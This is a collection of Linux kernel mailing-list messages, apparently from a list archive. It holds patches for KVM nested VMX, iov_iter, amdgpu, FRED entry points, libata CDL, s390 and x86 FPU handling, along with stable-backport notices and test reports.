@@ -3156,7 +3157,8 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS) &&
- CC(!kvm_dr7_valid(vmcs12->guest_dr7)))
+ (CC(!kvm_dr7_valid(vmcs12->guest_dr7)) ||
+ CC(!vmx_is_valid_debugctl(vcpu, vmcs12->guest_ia32_debugctl, false))))
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_PAT) &&
@@ -4608,6 +4610,12 @@ static void sync_vmcs02_to_vmcs12(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12)
(vmcs12->vm_entry_controls & ~VM_ENTRY_IA32E_MODE) |
(vm_entry_controls_get(to_vmx(vcpu)) & VM_ENTRY_IA32E_MODE);
+ /*
+ * Note! Save DR7, but intentionally don't grab DEBUGCTL from vmcs02.
+ * Writes to DEBUGCTL that aren't intercepted by L1 are immediately
+ * propagated to vmcs12 (see vmx_set_msr()), as the value loaded into
+ * vmcs02 doesn't strictly track vmcs12.
+ */
if (vmcs12->vm_exit_controls & VM_EXIT_SAVE_DEBUG_CONTROLS)
vmcs12->guest_dr7 = vcpu->arch.dr7;
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4f827a75d980..6a8b78e954cd 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2174,7 +2174,7 @@ static u64 nested_vmx_truncate_sysenter_addr(struct kvm_vcpu *vcpu,
return (unsigned long)data;
}
-static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
{
u64 debugctl = 0;
@@ -2193,8 +2193,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
return debugctl;
}
-static bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data,
- bool host_initiated)
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
{
u64 invalid;
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index b5758c33c60f..392e66c7e5fe 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -414,6 +414,9 @@ static inline void vmx_set_intercept_for_msr(struct kvm_vcpu *vcpu, u32 msr,
void vmx_update_cpu_dirty_logging(struct kvm_vcpu *vcpu);
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated);
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated);
+
/*
* Note, early Intel manuals have the write-low and read-high bitmap offsets
* the wrong way round. The bitmaps control MSRs 0x00000000-0x00001fff and
- patch 1/2 fixes a NULL dereference in the control path of sch_ets qdisc
- patch 2/2 extends kselftests to verify effectiveness of the above fix
Changes since v1:
- added a kselftest (thanks Victor)
Davide Caratti (2):
net/sched: ets: use old 'nbands' while purging unused classes
selftests: net/forwarding: test purge of active DWRR classes
net/sched/sch_ets.c | 11 ++++++-----
tools/testing/selftests/net/forwarding/sch_ets.sh | 1 +
.../testing/selftests/net/forwarding/sch_ets_tests.sh | 8 ++++++++
3 files changed, 15 insertions(+), 5 deletions(-)
--
2.47.0
So we've had this regression in 9p for.. almost a year, which is way too
long, but there was no "easy" reproducer until yesterday (thank you
again!!)
It turned out to be a bug with iov_iter on folios,
iov_iter_get_pages_alloc2() would advance the iov_iter correctly up to
the end edge of a folio and the later copy_to_iter() fails on the
iterate_folioq() bug.
Happy to consider alternative ways of fixing this, now there's a
reproducer it's all much clearer; for the bug to be visible we basically
need to make and IO with non-contiguous folios in the iov_iter which is
not obvious to test with synthetic VMs, with size that triggers a
zero-copy read followed by a non-zero-copy read.
Signed-off-by: Dominique Martinet <asmadeus(a)codewreck.org>
---
Dominique Martinet (2):
iov_iter: iterate_folioq: fix handling of offset >= folio size
iov_iter: iov_folioq_get_pages: don't leave empty slot behind
include/linux/iov_iter.h | 3 +++
lib/iov_iter.c | 6 +++---
2 files changed, 6 insertions(+), 3 deletions(-)
---
base-commit: 8f5ae30d69d7543eee0d70083daf4de8fe15d585
change-id: 20250811-iot_iter_folio-1b7849f88fed
Best regards,
--
Dominique Martinet <asmadeus(a)codewreck.org>
Maybe we could only add US_FL_IGNORE_DEVICE for the exact Realtek-based models (Mercury MW310UH, D-Link AX9U, etc.) that fail with usb_modeswitch.
This avoids disabling access to the emulated CD for unrelated devices.
>On August 13, 2025 9:53:12 PM GMT+04:00, Zenm Chen <zenmchen(a)gmail.com> wrote:
>>Alan Stern <stern(a)rowland.harvard.edu> 於 2025年8月14日 週四 上午12:58寫道:
>>>
>>> On Thu, Aug 14, 2025 at 12:24:15AM +0800, Zenm Chen wrote:
>>> > Many Realtek USB Wi-Fi dongles released in recent years have two modes:
>>> > one is driver CD mode which has Windows driver onboard, another one is
>>> > Wi-Fi mode. Add the US_FL_IGNORE_DEVICE quirk for these multi-mode devices.
>>> > Otherwise, usb_modeswitch may fail to switch them to Wi-Fi mode.
>>>
>>> There are several other entries like this already in the unusual_devs.h
>>> file. But I wonder if we really still need them. Shouldn't the
>>> usb_modeswitch program be smart enough by now to know how to handle
>>> these things?
>>
>>Hi Alan,
>>
>>Thanks for your review and reply.
>>
>>Without this patch applied, usb_modeswitch cannot switch my Mercury MW310UH
>>into Wi-Fi mode [1]. I also ran into a similar problem like [2] with D-Link
>>AX9U, so I believe this patch is needed.
>>
>>>
>>> In theory, someone might want to access the Windows driver on the
>>> emulated CD. With this quirk, they wouldn't be able to.
>>>
>>
>>Actually an emulated CD doesn't appear when I insert these 2 Wi-Fi dongles into
>>my Linux PC, so users cannot access that Windows driver even if this patch is not
>>applied.
>>
>>> Alan Stern
>>
>>[1] https://drive.google.com/file/d/1YfWUTxKnvSeu1egMSwcF-memu3Kis8Mg/view?usp=…
>>
>>[2] https://github.com/morrownr/rtw89/issues/10
>>
From: Tom Chung <chiahsuan.chung(a)amd.com>
[WHY & HOW]
IPS & self-fresh feature can cause vblank counter resets between
vblank disable and enable.
It may cause system stuck due to wait the vblank counter.
Call the drm_crtc_vblank_restore() during vblank enable to estimate
missed vblanks by using timestamps and update the vblank counter in
DRM.
It can make the vblank counter increase smoothly and resolve this issue.
Cc: Mario Limonciello <mario.limonciello(a)amd.com>
Cc: Alex Deucher <alexander.deucher(a)amd.com>
Cc: stable(a)vger.kernel.org
Reviewed-by: Sun peng (Leo) Li <sunpeng.li(a)amd.com>
Signed-off-by: Tom Chung <chiahsuan.chung(a)amd.com>
Signed-off-by: Alex Hung <alex.hung(a)amd.com>
---
.../amd/display/amdgpu_dm/amdgpu_dm_crtc.c | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
index 010172f930ae..45feb404b097 100644
--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
@@ -299,6 +299,25 @@ static inline int amdgpu_dm_crtc_set_vblank(struct drm_crtc *crtc, bool enable)
irq_type = amdgpu_display_crtc_idx_to_irq_type(adev, acrtc->crtc_id);
if (enable) {
+ struct dc *dc = adev->dm.dc;
+ struct drm_vblank_crtc *vblank = drm_crtc_vblank_crtc(crtc);
+ struct psr_settings *psr = &acrtc_state->stream->link->psr_settings;
+ struct replay_settings *pr = &acrtc_state->stream->link->replay_settings;
+ bool sr_supported = (psr->psr_version != DC_PSR_VERSION_UNSUPPORTED) ||
+ pr->config.replay_supported;
+
+ /*
+ * IPS & self-refresh feature can cause vblank counter resets between
+ * vblank disable and enable.
+ * It may cause system stuck due to waiting for the vblank counter.
+ * Call this function to estimate missed vblanks by using timestamps and
+ * update the vblank counter in DRM.
+ */
+ if (dc->caps.ips_support &&
+ dc->config.disable_ips != DMUB_IPS_DISABLE_ALL &&
+ sr_supported && vblank->config.disable_immediate)
+ drm_crtc_vblank_restore(crtc);
+
/* vblank irq on -> Only need vupdate irq in vrr mode */
if (amdgpu_dm_crtc_vrr_active(acrtc_state))
rc = amdgpu_dm_crtc_set_vupdate_irq(crtc, true);
--
2.43.0
The patch titled
Subject: iov_iter: iterate_folioq: fix handling of offset >= folio size
has been added to the -mm mm-hotfixes-unstable branch. Its filename is
iov_iter-iterate_folioq-fix-handling-of-offset-=-folio-size.patch
This patch will shortly appear at
https://git.kernel.org/pub/scm/linux/kernel/git/akpm/25-new.git/tree/patche…
This patch will later appear in the mm-hotfixes-unstable branch at
git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
Before you just go and hit "reply", please:
a) Consider who else should be cc'ed
b) Prefer to cc a suitable mailing list as well
c) Ideally: find the original patch on the mailing list and do a
reply-to-all to that, adding suitable additional cc's
*** Remember to use Documentation/process/submit-checklist.rst when testing your code ***
The -mm tree is included into linux-next via the mm-everything
branch at git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
and is updated there every 2-3 working days
------------------------------------------------------
From: Dominique Martinet <asmadeus(a)codewreck.org>
Subject: iov_iter: iterate_folioq: fix handling of offset >= folio size
Date: Wed, 13 Aug 2025 15:04:55 +0900
It's apparently possible to get an iov advanced all the way up to the end
of the current page we're looking at, e.g.
(gdb) p *iter
$24 = {iter_type = 4 '\004', nofault = false, data_source = false, iov_offset = 4096, {__ubuf_iovec = {
iov_base = 0xffff88800f5bc000, iov_len = 655}, {{__iov = 0xffff88800f5bc000, kvec = 0xffff88800f5bc000,
bvec = 0xffff88800f5bc000, folioq = 0xffff88800f5bc000, xarray = 0xffff88800f5bc000,
ubuf = 0xffff88800f5bc000}, count = 655}}, {nr_segs = 2, folioq_slot = 2 '\002', xarray_start = 2}}
Where iov_offset is 4k with 4k-sized folios
This should have been fine because we're only in the 2nd slot and there's
another one after this, but iterate_folioq should not try to map a folio
that skips the whole size, and more importantly part here does not end up
zero (because 'PAGE_SIZE - skip % PAGE_SIZE' ends up PAGE_SIZE and not
zero..), so skip forward to the "advance to next folio" code
Link: https://lkml.kernel.org/r/20250813-iot_iter_folio-v3-0-a0ffad2b665a@codewre…
Link: https://lkml.kernel.org/r/20250813-iot_iter_folio-v3-1-a0ffad2b665a@codewre…
Signed-off-by: Dominique Martinet <asmadeus(a)codewreck.org>
Fixes: db0aa2e9566f ("mm: Define struct folio_queue and ITER_FOLIOQ to handle a sequence of folios")
Reported-by: Maximilian Bosch <maximilian(a)mbosch.me>
Reported-by: Ryan Lahfa <ryan(a)lahfa.xyz>
Reported-by: Christian Theune <ct(a)flyingcircus.io>
Reported-by: Arnout Engelen <arnout(a)bzzt.net>
Link: https://lkml.kernel.org/r/D4LHHUNLG79Y.12PI0X6BEHRHW@mbosch.me/
Acked-by: David Howells <dhowells(a)redhat.com>
Cc: Al Viro <viro(a)zeniv.linux.org.uk>
Cc: Christian Brauner <brauner(a)kernel.org>
Cc: Matthew Wilcox (Oracle) <willy(a)infradead.org>
Cc: <stable(a)vger.kernel.org> [6.12+]
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
include/linux/iov_iter.h | 20 +++++++++++---------
1 file changed, 11 insertions(+), 9 deletions(-)
--- a/include/linux/iov_iter.h~iov_iter-iterate_folioq-fix-handling-of-offset-=-folio-size
+++ a/include/linux/iov_iter.h
@@ -160,7 +160,7 @@ size_t iterate_folioq(struct iov_iter *i
do {
struct folio *folio = folioq_folio(folioq, slot);
- size_t part, remain, consumed;
+ size_t part, remain = 0, consumed;
size_t fsize;
void *base;
@@ -168,14 +168,16 @@ size_t iterate_folioq(struct iov_iter *i
break;
fsize = folioq_folio_size(folioq, slot);
- base = kmap_local_folio(folio, skip);
- part = umin(len, PAGE_SIZE - skip % PAGE_SIZE);
- remain = step(base, progress, part, priv, priv2);
- kunmap_local(base);
- consumed = part - remain;
- len -= consumed;
- progress += consumed;
- skip += consumed;
+ if (skip < fsize) {
+ base = kmap_local_folio(folio, skip);
+ part = umin(len, PAGE_SIZE - skip % PAGE_SIZE);
+ remain = step(base, progress, part, priv, priv2);
+ kunmap_local(base);
+ consumed = part - remain;
+ len -= consumed;
+ progress += consumed;
+ skip += consumed;
+ }
if (skip >= fsize) {
skip = 0;
slot++;
_
Patches currently in -mm which might be from asmadeus(a)codewreck.org are
iov_iter-iterate_folioq-fix-handling-of-offset-=-folio-size.patch
iov_iter-iov_folioq_get_pages-dont-leave-empty-slot-behind.patch
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 3da01ffe1aeaa0d427ab5235ba735226670a80d9
Gitweb: https://git.kernel.org/tip/3da01ffe1aeaa0d427ab5235ba735226670a80d9
Author: Xin Li (Intel) <xin(a)zytor.com>
AuthorDate: Tue, 15 Jul 2025 23:33:20 -07:00
Committer: Dave Hansen <dave.hansen(a)linux.intel.com>
CommitterDate: Wed, 13 Aug 2025 15:05:32 -07:00
x86/fred: Remove ENDBR64 from FRED entry points
The FRED specification has been changed in v9.0 to state that there
is no need for FRED event handlers to begin with ENDBR64, because
in the presence of supervisor indirect branch tracking, FRED event
delivery does not enter the WAIT_FOR_ENDBRANCH state.
As a result, remove ENDBR64 from FRED entry points.
Then add ANNOTATE_NOENDBR to indicate that FRED entry points will
never be used for indirect calls to suppress an objtool warning.
This change implies that any indirect CALL/JMP to FRED entry points
causes #CP in the presence of supervisor indirect branch tracking.
Credit goes to Jennifer Miller <jmill(a)asu.edu> and other contributors
from Arizona State University whose research shows that placing ENDBR
at entry points has negative value thus led to this change.
Note: This is obviously an incompatible change to the FRED
architecture. But, it's OK because there no FRED systems out in the
wild today. All production hardware and late pre-production hardware
will follow the FRED v9 spec and be compatible with this approach.
[ dhansen: add note to changelog about incompatibility ]
Fixes: 14619d912b65 ("x86/fred: FRED entry/exit and dispatch code")
Signed-off-by: Xin Li (Intel) <xin(a)zytor.com>
Signed-off-by: Dave Hansen <dave.hansen(a)linux.intel.com>
Reviewed-by: H. Peter Anvin (Intel) <hpa(a)zytor.com>
Reviewed-by: Andrew Cooper <andrew.cooper3(a)citrix.com>
Link: https://lore.kernel.org/linux-hardening/Z60NwR4w%2F28Z7XUa@ubun/
Cc:stable@vger.kernel.org
Link: https://lore.kernel.org/all/20250716063320.1337818-1-xin%40zytor.com
---
arch/x86/entry/entry_64_fred.S | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/arch/x86/entry/entry_64_fred.S b/arch/x86/entry/entry_64_fred.S
index 29c5c32..907bd23 100644
--- a/arch/x86/entry/entry_64_fred.S
+++ b/arch/x86/entry/entry_64_fred.S
@@ -16,7 +16,7 @@
.macro FRED_ENTER
UNWIND_HINT_END_OF_STACK
- ENDBR
+ ANNOTATE_NOENDBR
PUSH_AND_CLEAR_REGS
movq %rsp, %rdi /* %rdi -> pt_regs */
.endm
On 8/13/25 10:25, Jon Hunter wrote:
> On Wed, Aug 13, 2025 at 08:48:28AM -0700, Jon Hunter wrote:
>> On Tue, 12 Aug 2025 19:43:28 +0200, Greg Kroah-Hartman wrote:
>>> This is the start of the stable review cycle for the 6.15.10 release.
>>> There are 480 patches in this series, all will be posted as a response
>>> to this one. If anyone has any issues with these being applied, please
>>> let me know.
>>>
>>> Responses should be made by Thu, 14 Aug 2025 17:42:20 +0000.
>>> Anything received after that time might be too late.
>>>
>>> The whole patch series can be found in one patch at:
>>> https://www.kernel.org/pub/linux/kernel/v6.x/stable-review/patch-6.15.10-rc…
>>> or in the git tree and branch at:
>>> git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git linux-6.15.y
>>> and the diffstat can be found below.
>>>
>>> thanks,
>>>
>>> greg k-h
>> Failures detected for Tegra ...
>>
>> Test results for stable-v6.15:
>> 10 builds: 10 pass, 0 fail
>> 28 boots: 28 pass, 0 fail
>> 120 tests: 119 pass, 1 fail
>>
>> Linux version: 6.15.10-rc1-g2510f67e2e34
>> Boards tested: tegra124-jetson-tk1, tegra186-p2771-0000,
>> tegra186-p3509-0000+p3636-0001, tegra194-p2972-0000,
>> tegra194-p3509-0000+p3668-0000, tegra20-ventana,
>> tegra210-p2371-2180, tegra210-p3450-0000,
>> tegra30-cardhu-a04
>>
>> Test failures: tegra194-p2972-0000: boot.py
> I am seeing the following kernel warning for both linux-6.15.y and linux-6.16.y …
>
> WARNING KERN sched: DL replenish lagged too much
>
> I believe that this is introduced by …
>
> Peter Zijlstra <peterz(a)infradead.org>
> sched/deadline: Less agressive dl_server handling
>
> This has been reported here: https://lore.kernel.org/all/CAMuHMdXn4z1pioTtBGMfQM0jsLviqS2jwysaWXpoLxWYoG…
>
> Jon
Seeing this kernel warning on RISC-V also.
The FRED specification has been changed in v9.0 to state that there
is no need for FRED event handlers to begin with ENDBR64, because
in the presence of supervisor indirect branch tracking, FRED event
delivery does not enter the WAIT_FOR_ENDBRANCH state.
As a result, remove ENDBR64 from FRED entry points.
Then add ANNOTATE_NOENDBR to indicate that FRED entry points will
never be used for indirect calls to suppress an objtool warning.
This change implies that any indirect CALL/JMP to FRED entry points
causes #CP in the presence of supervisor indirect branch tracking.
Credit goes to Jennifer Miller <jmill(a)asu.edu> and other contributors
from Arizona State University whose research shows that placing ENDBR
at entry points has negative value thus led to this change.
Fixes: 14619d912b65 ("x86/fred: FRED entry/exit and dispatch code")
Link: https://lore.kernel.org/linux-hardening/Z60NwR4w%2F28Z7XUa@ubun/
Reviewed-by: H. Peter Anvin (Intel) <hpa(a)zytor.com>
Reviewed-by: Andrew Cooper <andrew.cooper3(a)citrix.com>
Signed-off-by: Xin Li (Intel) <xin(a)zytor.com>
Cc: Jennifer Miller <jmill(a)asu.edu>
Cc: Peter Zijlstra <peterz(a)infradead.org>
Cc: Andrew Cooper <andrew.cooper3(a)citrix.com>
Cc: H. Peter Anvin <hpa(a)zytor.com>
Cc: stable(a)vger.kernel.org # v6.9+
---
Change in v3:
*) Revise the FRED spec change description to clearly indicate that it
deviates from previous versions and is based on new research showing
that placing ENDBR at entry points has negative value (Andrew Cooper).
Change in v2:
*) CC stable and add a fixes tag (PeterZ).
---
arch/x86/entry/entry_64_fred.S | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/arch/x86/entry/entry_64_fred.S b/arch/x86/entry/entry_64_fred.S
index 29c5c32c16c3..907bd233c6c1 100644
--- a/arch/x86/entry/entry_64_fred.S
+++ b/arch/x86/entry/entry_64_fred.S
@@ -16,7 +16,7 @@
.macro FRED_ENTER
UNWIND_HINT_END_OF_STACK
- ENDBR
+ ANNOTATE_NOENDBR
PUSH_AND_CLEAR_REGS
movq %rsp, %rdi /* %rdi -> pt_regs */
.endm
--
2.50.1
This reverts commit 17e897a456752ec9c2d7afb3d9baf268b442451b.
The extra checks for the ATA_DFLAG_CDL_ENABLED flag prevent SET FEATURES
command from being issued to a drive when NCQ commands are active.
ata_mselect_control_ata_feature() sets / clears the ATA_DFLAG_CDL_ENABLED
flag during the translation of MODE SELECT to SET FEATURES. If SET FEATURES
gets deferred due to outstanding NCQ commands, the original MODE SELECT
command will be re-queued. When the re-queued MODE SELECT goes through
the ata_mselect_control_ata_feature() translation again, SET FEATURES
will not be issued because ATA_DFLAG_CDL_ENABLED has been already set or
cleared by the initial translation of MODE SELECT.
The ATA_DFLAG_CDL_ENABLED checks in ata_mselect_control_ata_feature()
are safe to remove because scsi_cdl_enable() implements a similar logic
that avoids enabling CDL if it has been already enabled.
Cc: stable(a)vger.kernel.org
Signed-off-by: Igor Pylypiv <ipylypiv(a)google.com>
---
drivers/ata/libata-scsi.c | 14 ++------------
1 file changed, 2 insertions(+), 12 deletions(-)
diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
index 57f674f51b0c..856eabfd5a17 100644
--- a/drivers/ata/libata-scsi.c
+++ b/drivers/ata/libata-scsi.c
@@ -3904,27 +3904,17 @@ static int ata_mselect_control_ata_feature(struct ata_queued_cmd *qc,
/* Check cdl_ctrl */
switch (buf[0] & 0x03) {
case 0:
- /* Disable CDL if it is enabled */
- if (!(dev->flags & ATA_DFLAG_CDL_ENABLED))
- return 0;
- ata_dev_dbg(dev, "Disabling CDL\n");
+ /* Disable CDL */
cdl_action = 0;
dev->flags &= ~ATA_DFLAG_CDL_ENABLED;
break;
case 0x02:
- /*
- * Enable CDL if not already enabled. Since this is mutually
- * exclusive with NCQ priority, allow this only if NCQ priority
- * is disabled.
- */
- if (dev->flags & ATA_DFLAG_CDL_ENABLED)
- return 0;
+ /* Enable CDL T2A/T2B: NCQ priority must be disabled */
if (dev->flags & ATA_DFLAG_NCQ_PRIO_ENABLED) {
ata_dev_err(dev,
"NCQ priority must be disabled to enable CDL\n");
return -EINVAL;
}
- ata_dev_dbg(dev, "Enabling CDL\n");
cdl_action = 1;
dev->flags |= ATA_DFLAG_CDL_ENABLED;
break;
--
2.51.0.rc0.215.g125493bb4a-goog
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x 5647f61ad9171e8f025558ed6dc5702c56a33ba3
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081255-shabby-impound-4a47@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 5647f61ad9171e8f025558ed6dc5702c56a33ba3 Mon Sep 17 00:00:00 2001
From: Gerald Schaefer <gerald.schaefer(a)linux.ibm.com>
Date: Wed, 9 Jul 2025 20:34:30 +0200
Subject: [PATCH] s390/mm: Remove possible false-positive warning in
pte_free_defer()
Commit 8211dad627981 ("s390: add pte_free_defer() for pgtables sharing
page") added a warning to pte_free_defer(), on our request. It was meant
to warn if this would ever be reached for KVM guest mappings, because
the page table would be freed w/o a gmap_unlink(). THP mappings are not
allowed for KVM guests on s390, so this should never happen.
However, it is possible that the warning is triggered in a valid case as
false-positive.
s390_enable_sie() takes the mmap_lock, marks all VMAs as VM_NOHUGEPAGE and
splits possibly existing THP guest mappings. mm->context.has_pgste is set
to 1 before that, to prevent races with the mm_has_pgste() check in
MADV_HUGEPAGE.
khugepaged drops the mmap_lock for file mappings and might run in parallel,
before a vma is marked VM_NOHUGEPAGE, but after mm->context.has_pgste was
set to 1. If it finds file mappings to collapse, it will eventually call
pte_free_defer(). This will trigger the warning, but it is a valid case
because gmap is not yet set up, and the THP mappings will be split again.
Therefore, remove the warning and the comment.
Fixes: 8211dad627981 ("s390: add pte_free_defer() for pgtables sharing page")
Cc: <stable(a)vger.kernel.org> # 6.6+
Reviewed-by: Alexander Gordeev <agordeev(a)linux.ibm.com>
Reviewed-by: Claudio Imbrenda <imbrenda(a)linux.ibm.com>
Signed-off-by: Gerald Schaefer <gerald.schaefer(a)linux.ibm.com>
Signed-off-by: Alexander Gordeev <agordeev(a)linux.ibm.com>
diff --git a/arch/s390/mm/pgalloc.c b/arch/s390/mm/pgalloc.c
index b449fd2605b0..d2f6f1f6d2fc 100644
--- a/arch/s390/mm/pgalloc.c
+++ b/arch/s390/mm/pgalloc.c
@@ -173,11 +173,6 @@ void pte_free_defer(struct mm_struct *mm, pgtable_t pgtable)
struct ptdesc *ptdesc = virt_to_ptdesc(pgtable);
call_rcu(&ptdesc->pt_rcu_head, pte_free_now);
- /*
- * THPs are not allowed for KVM guests. Warn if pgste ever reaches here.
- * Turn to the generic pte_free_defer() version once gmap is removed.
- */
- WARN_ON_ONCE(mm_has_pgste(mm));
}
#endif /* CONFIG_TRANSPARENT_HUGEPAGE */
The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x 1cec9ac2d071cfd2da562241aab0ef701355762a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081252-serotonin-cranium-3e92@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 1cec9ac2d071cfd2da562241aab0ef701355762a Mon Sep 17 00:00:00 2001
From: Dave Hansen <dave.hansen(a)linux.intel.com>
Date: Tue, 24 Jun 2025 14:01:48 -0700
Subject: [PATCH] x86/fpu: Delay instruction pointer fixup until after warning
Right now, if XRSTOR fails a console message like this is be printed:
Bad FPU state detected at restore_fpregs_from_fpstate+0x9a/0x170, reinitializing FPU registers.
However, the text location (...+0x9a in this case) is the instruction
*AFTER* the XRSTOR. The highlighted instruction in the "Code:" dump
also points one instruction late.
The reason is that the "fixup" moves RIP up to pass the bad XRSTOR and
keep on running after returning from the #GP handler. But it does this
fixup before warning.
The resulting warning output is nonsensical because it looks like the
non-FPU-related instruction is #GP'ing.
Do not fix up RIP until after printing the warning. Do this by using
the more generic and standard ex_handler_default().
Fixes: d5c8028b4788 ("x86/fpu: Reinitialize FPU registers if restoring FPU state fails")
Signed-off-by: Dave Hansen <dave.hansen(a)linux.intel.com>
Reviewed-by: Chao Gao <chao.gao(a)intel.com>
Acked-by: Alison Schofield <alison.schofield(a)intel.com>
Acked-by: Peter Zijlstra (Intel) <peterz(a)infradead.org>
Cc:stable@vger.kernel.org
Link: https://lore.kernel.org/all/20250624210148.97126F9E%40davehans-spike.ostc.i…
diff --git a/arch/x86/mm/extable.c b/arch/x86/mm/extable.c
index bf8dab18be97..2fdc1f1f5adb 100644
--- a/arch/x86/mm/extable.c
+++ b/arch/x86/mm/extable.c
@@ -122,13 +122,12 @@ static bool ex_handler_sgx(const struct exception_table_entry *fixup,
static bool ex_handler_fprestore(const struct exception_table_entry *fixup,
struct pt_regs *regs)
{
- regs->ip = ex_fixup_addr(fixup);
-
WARN_ONCE(1, "Bad FPU state detected at %pB, reinitializing FPU registers.",
(void *)instruction_pointer(regs));
fpu_reset_from_exception_fixup();
- return true;
+
+ return ex_handler_default(fixup, regs);
}
/*
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x 1cec9ac2d071cfd2da562241aab0ef701355762a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081251-sitter-agreed-26a4@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 1cec9ac2d071cfd2da562241aab0ef701355762a Mon Sep 17 00:00:00 2001
From: Dave Hansen <dave.hansen(a)linux.intel.com>
Date: Tue, 24 Jun 2025 14:01:48 -0700
Subject: [PATCH] x86/fpu: Delay instruction pointer fixup until after warning
Right now, if XRSTOR fails a console message like this is be printed:
Bad FPU state detected at restore_fpregs_from_fpstate+0x9a/0x170, reinitializing FPU registers.
However, the text location (...+0x9a in this case) is the instruction
*AFTER* the XRSTOR. The highlighted instruction in the "Code:" dump
also points one instruction late.
The reason is that the "fixup" moves RIP up to pass the bad XRSTOR and
keep on running after returning from the #GP handler. But it does this
fixup before warning.
The resulting warning output is nonsensical because it looks like the
non-FPU-related instruction is #GP'ing.
Do not fix up RIP until after printing the warning. Do this by using
the more generic and standard ex_handler_default().
Fixes: d5c8028b4788 ("x86/fpu: Reinitialize FPU registers if restoring FPU state fails")
Signed-off-by: Dave Hansen <dave.hansen(a)linux.intel.com>
Reviewed-by: Chao Gao <chao.gao(a)intel.com>
Acked-by: Alison Schofield <alison.schofield(a)intel.com>
Acked-by: Peter Zijlstra (Intel) <peterz(a)infradead.org>
Cc:stable@vger.kernel.org
Link: https://lore.kernel.org/all/20250624210148.97126F9E%40davehans-spike.ostc.i…
diff --git a/arch/x86/mm/extable.c b/arch/x86/mm/extable.c
index bf8dab18be97..2fdc1f1f5adb 100644
--- a/arch/x86/mm/extable.c
+++ b/arch/x86/mm/extable.c
@@ -122,13 +122,12 @@ static bool ex_handler_sgx(const struct exception_table_entry *fixup,
static bool ex_handler_fprestore(const struct exception_table_entry *fixup,
struct pt_regs *regs)
{
- regs->ip = ex_fixup_addr(fixup);
-
WARN_ONCE(1, "Bad FPU state detected at %pB, reinitializing FPU registers.",
(void *)instruction_pointer(regs));
fpu_reset_from_exception_fixup();
- return true;
+
+ return ex_handler_default(fixup, regs);
}
/*
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x 1cec9ac2d071cfd2da562241aab0ef701355762a
# <resolve conflicts, build, test, etc.>
git commit -s
